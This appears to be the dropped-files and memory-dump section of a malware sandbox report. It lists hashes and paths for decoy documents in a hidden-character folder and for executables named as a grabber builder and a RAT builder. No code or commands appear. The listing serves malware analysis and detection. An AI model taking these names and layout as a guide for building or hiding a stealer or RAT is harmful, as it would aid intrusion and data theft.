C:\Users\Admin\AppData\Local\Temp\  ‌‎ \Common Files\Desktop\CheckpointProtect.docx

Filesize
18KB

MD5
46c054e529205931fdb725ddd08fbcad

SHA1
0398097ce75d18e451618955a8882ab8163dcf9d

SHA256
6bd3c25db4b1bc73249f3d9da391bb7e753f503d8aaf7cf547fa1e163aab6856

SHA512
04ac8368d72942716b83b28225fb1877ad3dde407dc49b9d067ef759b4f4e9543e492ce3c42c96830c926c7fcaabc524f46dd29f347b715cabcd01bdb41af449

Download Submit
C:\Users\Admin\AppData\Local\Temp\  ‌‎ \Common Files\Desktop\EditConvertFrom.docx

Filesize
15KB

MD5
aa62fa84803d6b9e3e26d491b268e5c6

SHA1
66c5c5dafd2013671bfbc210074b1e7754a52e95

SHA256
82f03f7f075dcaab2aecd8b09d5c0e3568189b35845d73da707283c2771df503

SHA512
5767f18babe4918a3eb63421b4ddde346e928687830b8024dec24c141a045d9a7276eb2fc649d2dedf02909d9935f881a96cd85fca79d9e9d8945602576f740e

Download Submit
C:\Users\Admin\AppData\Local\Temp\  ‌‎ \Common Files\Desktop\LockUndo.mp4

Filesize
798KB

MD5
397cf6d6b40da2b14e473c5c11b92286

SHA1
0f4eb17b5f5bc074205667619671a2f62575be38

SHA256
ec08623d6b7da58fbea9fea2d20c78c589fc8952897ac00d1ff32524fe69f7ec

SHA512
98ec99da5505cd9b73265017bc2451315d7f7eb0f7cdddf077c16209250d08be0692c20aff7ce7d3ffe2f6bf67dc493c6b5060b703288184f29a2b588669f1e2

Download Submit
C:\Users\Admin\AppData\Local\Temp\  ‌‎ \Common Files\Desktop\OptimizeConvert.docx

Filesize
14KB

MD5
cc35fd0a87f8de9e6f5f5aa531447c11

SHA1
88b7e56137bb322bcfee506a5bebbf90a0b51931

SHA256
b3fdb735423e6e65826f0ec770e9b4a502c722956b2d65f2df8d42bdd80550a6

SHA512
49e5b77574026203b00cd8753567b2971cc04ee5bb6d0e95ddd2d15986d3f9038845b2ff0dde19a5b69269d20b4e38b15a046723ba2987751a669148af275573

Download Submit
C:\Users\Admin\AppData\Local\Temp\  ‌‎ \Common Files\Desktop\RegisterAssert.xlsx

Filesize
10KB

MD5
dd6237db57e629c02c1ec2d1c43f93f0

SHA1
8ca92d50751fc44478bdc3d76396f66bfc185488

SHA256
afbc2bd250a3a0325c7d311175f18dc4feb308b6693d1b44a117b7cb22ca371d

SHA512
94cbf63066904a2917f2002fb51f07abfe96452cc82de7dc6d2d6b48dd5470d3540cd754f6747ceea961c033db3a550adfadc78f67bc6d0ebe66dd967551b374

Download Submit
C:\Users\Admin\AppData\Local\Temp\  ‌‎ \Common Files\Desktop\RemoveStep.xlsx

Filesize
11KB

MD5
0d66f07907b2f25704edb65b211f8395

SHA1
758a50b8b0f455f0ba07a17142aa74db0114d0d9

SHA256
8500f256cd57adaed677462d9297f2b0402a590087d73070b7fbaf79347a2569

SHA512
e438912d1fe95b51dac4e0ddfc18684540a553fb711349ea828c884ca405e5dd2a91f5e0a4e0d221d6bfcf932abebfa312b0f7a184ff50c041a9f6405141b5bd

Download Submit
C:\Users\Admin\AppData\Local\Temp\  ‌‎ \Common Files\Desktop\ResumeAdd.mp3

Filesize
499KB

MD5
9024bb2f7c8f84615185387f49b0147c

SHA1
0e70f19c64605607f1480a8b6e76789280602755

SHA256
d75d2cb7e2a175300ae17ba69f6e8f6eda120cd63b47918a352eaa597f195dd1

SHA512
3d9bbde891d383e91a3cc3e0d258079fdab6177d4a8889c3f9fa17699ffff807714008ebbf77dec74941aed6d2221228621a5b2310f63d805c393031a7791a7b

Download Submit
C:\Users\Admin\AppData\Local\Temp\  ‌‎ \Common Files\Desktop\SetPush.xlsx

Filesize
10KB

MD5
130e32593e91b22ea119247019deef32

SHA1
d759aab86aaef77540c3a52bf7b15f4a17688ea2

SHA256
004313666f001f4d50b4b822d32ec6b62ddbf2b790732abb4e6440087f182c21

SHA512
d469e3f8a2039489ed7c400b7e0e7f9a84ae0397a1c3151bbf99c239b52601360246815c8689192917edffd5eb6daf00b376ee69349cb820ae4951a8ec554267

Download Submit
C:\Windows\MyGrabberBuilt(rename).exe

Filesize
7.5MB

MD5
c38393d80a552d3c14d0103d84359321

SHA1
6a2515d36f3aede3fe43b6d8462187c65495b614

SHA256
bf803198af019c65692129a8f516cf280655ceb2aedcb6b4b959ea77800d0bd2

SHA512
e0ca229e8a3a1de7b260cb2b4000de3da0aa0cabb23de3c091e8e1aa87ba38af0d780fb108295793efe40686f581ec46e19067a43a8657071cd69a9557248343

Download Submit
C:\Windows\MyRatBuilder(rename).exe

Filesize
78KB

MD5
5d200c5467a787f5c231ee291169b6dc

SHA1
792ec91624ef031de6206a9da49fd060aea87bdf

SHA256
74adc7fb9835fcc0dc6fc18953dd35b88868a7cbe39f900f96ee69049b3258ef

SHA512
28f61d50edb5c6f7b9073059c7f14a176738018388a172766e88c4b06ea777e66111a0b4fbe5f67988769298ec48799e03d3528658113b65f4c1fb98a0aeaf7f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\x4gwe0nt\CSCECAA07BBD6014660B8C599D5E191E0D4.TMP

Filesize
652B

MD5
4d93e128fdf4ec04de179e3da560c98d

SHA1
fa22ee525d9aa2dbcbf3393a207250cd02726f77

SHA256
908a3770531b3fac6a5c50b7e259573e54208acb1d86ed7180c696b0beefd602

SHA512
c42d2ceb1284e7538f6e08c08ef3ae0f3c69bc60f930157a1ee25000dc010601f0b5dbbfadec7b1958049bf244df2f62253d9cd6db1c9fe038c8605897b74927

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\x4gwe0nt\x4gwe0nt.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\x4gwe0nt\x4gwe0nt.cmdline

Filesize
607B

MD5
9edf9b580b5bdbd0098ac9dd46a96bc3

SHA1
92853e9a8106d12a489fc80e868af572826cd694

SHA256
b509996c789fab365d1804a1b8aa9966d803012112198cf51d553ec77deb5c82

SHA512
f116d82c4947fbc279a490c4627c988295774e52f26bdca363feba5f39477e70be2f6c18afe07ff2077602d3c9333c19d5f19fbb2ca13d83219d96876131285d

Download Submit
memory/1356-152-0x000001F6B41D0000-0x000001F6B41F2000-memory.dmp

Filesize
136KB

Download
memory/2352-11-0x0000021D0EBB0000-0x0000021D0EBC8000-memory.dmp

Filesize
96KB

Download
memory/2352-57-0x0000021D29A10000-0x0000021D29F38000-memory.dmp

Filesize
5.2MB

Download
memory/2352-25-0x00007FFC082C0000-0x00007FFC08D81000-memory.dmp

Filesize
10.8MB

Download
memory/2352-14-0x0000021D29210000-0x0000021D293D2000-memory.dmp

Filesize
1.8MB

Download
memory/2352-12-0x00007FFC082C3000-0x00007FFC082C5000-memory.dmp

Filesize
8KB

Download
memory/2352-126-0x00007FFC082C0000-0x00007FFC08D81000-memory.dmp

Filesize
10.8MB

Download
memory/2596-144-0x0000000006F60000-0x0000000006F6A000-memory.dmp

Filesize
40KB

Download
memory/2596-131-0x0000000006BB0000-0x0000000006C53000-memory.dmp

Filesize
652KB

Download
memory/2596-71-0x0000000005BA0000-0x0000000005BBE000-memory.dmp

Filesize
120KB

Download
memory/2596-72-0x0000000005BE0000-0x0000000005C2C000-memory.dmp

Filesize
304KB

Download
memory/2596-70-0x0000000005680000-0x00000000059D4000-memory.dmp

Filesize
3.3MB

Download
memory/2596-145-0x0000000007180000-0x0000000007216000-memory.dmp

Filesize
600KB

Download
memory/2596-146-0x00000000070F0000-0x0000000007101000-memory.dmp

Filesize
68KB

Download
memory/2596-59-0x0000000005310000-0x0000000005376000-memory.dmp

Filesize
408KB

Download
memory/2596-60-0x0000000005480000-0x00000000054E6000-memory.dmp

Filesize
408KB

Download
memory/2596-58-0x0000000004C20000-0x0000000004C42000-memory.dmp

Filesize
136KB

Download
memory/2596-142-0x0000000007530000-0x0000000007BAA000-memory.dmp

Filesize
6.5MB

Download
memory/2596-143-0x0000000006EF0000-0x0000000006F0A000-memory.dmp

Filesize
104KB

Download
memory/2596-125-0x0000000006180000-0x000000000619E000-memory.dmp

Filesize
120KB

Download
memory/2596-113-0x0000000074F00000-0x0000000074F4C000-memory.dmp

Filesize
304KB

Download
memory/2596-112-0x0000000006B70000-0x0000000006BA2000-memory.dmp

Filesize
200KB

Download
memory/2596-54-0x00000000045F0000-0x0000000004626000-memory.dmp

Filesize
216KB

Download
memory/2596-166-0x0000000007130000-0x000000000713E000-memory.dmp

Filesize
56KB

Download
memory/2596-168-0x0000000007140000-0x0000000007154000-memory.dmp

Filesize
80KB

Download
memory/2596-169-0x0000000007220000-0x000000000723A000-memory.dmp

Filesize
104KB

Download
memory/2596-170-0x0000000007170000-0x0000000007178000-memory.dmp

Filesize
32KB

Download
memory/2596-56-0x0000000004CE0000-0x0000000005308000-memory.dmp

Filesize
6.2MB

Download
memory/3308-103-0x00007FFC18620000-0x00007FFC1863A000-memory.dmp

Filesize
104KB

Download
memory/3308-376-0x00007FFC02B70000-0x00007FFC02CEF000-memory.dmp

Filesize
1.5MB

Download
memory/3308-141-0x00007FFC17F30000-0x00007FFC17F55000-memory.dmp

Filesize
148KB

Download
memory/3308-399-0x00007FFC042A0000-0x00007FFC04964000-memory.dmp

Filesize
6.8MB

Download
memory/3308-140-0x00007FFC178F0000-0x00007FFC178FD000-memory.dmp

Filesize
52KB

Download
memory/3308-55-0x00007FFC042A0000-0x00007FFC04964000-memory.dmp

Filesize
6.8MB

Download
memory/3308-139-0x00007FFC02050000-0x00007FFC0216B000-memory.dmp

Filesize
1.1MB

Download
memory/3308-130-0x00007FFC02570000-0x00007FFC02A99000-memory.dmp

Filesize
5.2MB

Download
memory/3308-107-0x00007FFC02B70000-0x00007FFC02CEF000-memory.dmp

Filesize
1.5MB

Download
memory/3308-105-0x00007FFC17910000-0x00007FFC17934000-memory.dmp

Filesize
144KB

Download
memory/3308-127-0x00007FFC17B40000-0x00007FFC17B59000-memory.dmp

Filesize
100KB

Download
memory/3308-349-0x00007FFC17910000-0x00007FFC17934000-memory.dmp

Filesize
144KB

Download
memory/3308-101-0x00007FFC17A00000-0x00007FFC17A2D000-memory.dmp

Filesize
180KB

Download
memory/3308-128-0x00007FFC16F80000-0x00007FFC16FB3000-memory.dmp

Filesize
204KB

Download
memory/3308-129-0x00007FFC02AA0000-0x00007FFC02B6D000-memory.dmp

Filesize
820KB

Download
memory/3308-132-0x00000226A88C0000-0x00000226A8DE9000-memory.dmp

Filesize
5.2MB

Download
memory/3308-137-0x00007FFC042A0000-0x00007FFC04964000-memory.dmp

Filesize
6.8MB

Download
memory/3308-94-0x00007FFC17F30000-0x00007FFC17F55000-memory.dmp

Filesize
148KB

Download
memory/3308-138-0x00007FFC17130000-0x00007FFC17144000-memory.dmp

Filesize
80KB

Download
memory/3308-95-0x00007FFC1B8B0000-0x00007FFC1B8BF000-memory.dmp

Filesize
60KB

Download
memory/3308-362-0x00007FFC17F30000-0x00007FFC17F55000-memory.dmp

Filesize
148KB

Download
memory/3308-133-0x00007FFC17900000-0x00007FFC1790D000-memory.dmp

Filesize
52KB

Download
memory/3308-375-0x00007FFC02050000-0x00007FFC0216B000-memory.dmp

Filesize
1.1MB

Download
memory/3308-371-0x00007FFC02AA0000-0x00007FFC02B6D000-memory.dmp

Filesize
820KB

Download
memory/3308-370-0x00007FFC16F80000-0x00007FFC16FB3000-memory.dmp

Filesize
204KB

Download
memory/3308-361-0x00007FFC042A0000-0x00007FFC04964000-memory.dmp

Filesize
6.8MB

Download
memory/3308-372-0x00007FFC02570000-0x00007FFC02A99000-memory.dmp

Filesize
5.2MB

Download
memory/3308-378-0x00000226A88C0000-0x00000226A8DE9000-memory.dmp

Filesize
5.2MB

Download
memory/3308-424-0x00007FFC02AA0000-0x00007FFC02B6D000-memory.dmp

Filesize
820KB

Download
memory/3308-427-0x00007FFC02050000-0x00007FFC0216B000-memory.dmp

Filesize
1.1MB

Download
memory/3308-426-0x00007FFC17130000-0x00007FFC17144000-memory.dmp

Filesize
80KB

Download
memory/3308-425-0x00007FFC02570000-0x00007FFC02A99000-memory.dmp

Filesize
5.2MB

Download
memory/3308-423-0x00007FFC16F80000-0x00007FFC16FB3000-memory.dmp

Filesize
204KB

Download
memory/3308-422-0x00007FFC17B40000-0x00007FFC17B59000-memory.dmp

Filesize
100KB

Download
memory/3308-421-0x00007FFC02B70000-0x00007FFC02CEF000-memory.dmp

Filesize
1.5MB

Download
memory/3308-420-0x00007FFC17910000-0x00007FFC17934000-memory.dmp

Filesize
144KB

Download
memory/3308-419-0x00007FFC18620000-0x00007FFC1863A000-memory.dmp

Filesize
104KB

Download
memory/3308-418-0x00007FFC17A00000-0x00007FFC17A2D000-memory.dmp

Filesize
180KB

Download
memory/3308-417-0x00007FFC17900000-0x00007FFC1790D000-memory.dmp

Filesize
52KB

Download
memory/3308-416-0x00007FFC17F30000-0x00007FFC17F55000-memory.dmp

Filesize
148KB

Download
memory/3308-415-0x00007FFC178F0000-0x00007FFC178FD000-memory.dmp

Filesize
52KB

Download
memory/3308-414-0x00007FFC1B8B0000-0x00007FFC1B8BF000-memory.dmp

Filesize
60KB

Download
memory/4744-266-0x000002D04F580000-0x000002D04F588000-memory.dmp

Filesize
32KB

Download